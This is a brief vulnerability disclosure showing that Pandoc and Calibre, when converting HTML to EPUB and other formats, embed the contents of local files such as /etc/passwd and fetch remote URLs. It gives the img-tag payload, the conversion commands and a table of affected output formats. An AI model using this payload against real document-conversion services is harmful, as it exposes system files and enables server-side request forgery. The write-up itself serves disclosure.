πΈοΈ https://github.com/jgm/pandoc (Pandoc in Github)
- What is Pandoc?
- Pandoc is a Universal Markup Converter
πΈοΈ https://github.com/kovidgoyal/calibre (Calibre in Github)
- What is Calibre?
- The official source code repository for the calibre ebook manager
<img src="file:///etc/passwd"><img src="http://ip-api.com/csv">
- When we want to convert an html file to a different document via terminal, we use the following command.
$ pandoc ssrf.html -o ssrf.epubPANDOC$ ebook-convert ssrf.html ssrf.epubCALIBRE
$ pandoc ssrf.html -o ssrf.epubPANDOC
- After the html file is successfully converted to epub file, you need to open this epub file with "Archive Manager"
- When we check the folders and subfolders in the epub file we opened with "Archive Manager", we will see one or two different files. When we open these files, we can see that the ssrf vulnerability is triggered.
- I went through all converter processes in pandoc and calibre and found that this vulnerability exists in multiple converters.
- In the table below, you can examine what types of ssrf are in which files.
- You can also use the iframe tag instead of the img tag in calibre.
| PANDOC | EPUB | ODT | DOCX | PPTX | FB2 |
|---|---|---|---|---|---|
<img src="file:///etc/passwd"> |
βοΈ | βοΈ | β | βοΈ | β |
<img src="http://ip-api.com/csv"> |
βοΈ | βοΈ | βοΈ | β | βοΈ (Base64 Encoded) |
| CALIBRE | EPUB |
|---|---|
<img src="file:///etc/passwd"> |
βοΈ |
<img src="http://ip-api.com/csv"> |
β |
- In the example, we converted our html file to epub, but as you can see in the table above, we can see that the vulnerability is triggered not only when converting to epub but also other files.